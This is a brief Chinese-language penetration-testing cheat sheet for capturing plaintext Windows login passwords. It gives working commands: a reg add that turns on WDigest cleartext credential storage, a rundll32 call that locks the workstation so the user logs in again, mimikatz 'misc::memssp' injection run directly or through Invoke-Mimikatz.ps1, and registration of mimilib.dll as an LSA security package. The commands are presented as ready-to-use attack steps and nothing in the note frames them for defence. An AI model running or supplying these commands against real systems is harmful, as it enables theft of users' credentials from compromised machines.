0x01 前言
0x02 改注册表(mimitaze存在免杀问题)
修改成记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改不记录明文密码
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
锁屏
rundll32.exe user32.dll,LockWorkStation
修改完之后使用命令锁屏,接下来等待用户再次登录一次就可以抓到了
0x03 mimikatz插ssp记录密码
privilege::debug、misc::memssp
rundll32.exe user32.dll,LockWorkStation
0x04 使用Invoke-Mimikatz.ps1
Import-Module .\Invoke-Mimikatz.ps1 //导入命令
Invoke-Mimikatz -Command "misc::memssp" //不需要重启获取
记录的明文密码存储在这个路径下
凭据收集总结:
https://cloud.tencent.com/developer/article/1656546
0x05 复制mimilib.dll+修改注册表
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f
渗透技巧-通过CredSSP导出用户的明文口令:
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87CredSSP%E5%AF%BC%E5%87%BA%E7%94%A8%E6%88%B7%E7%9A%84%E6%98%8E%E6%96%87%E5%8F%A3%E4%BB%A4/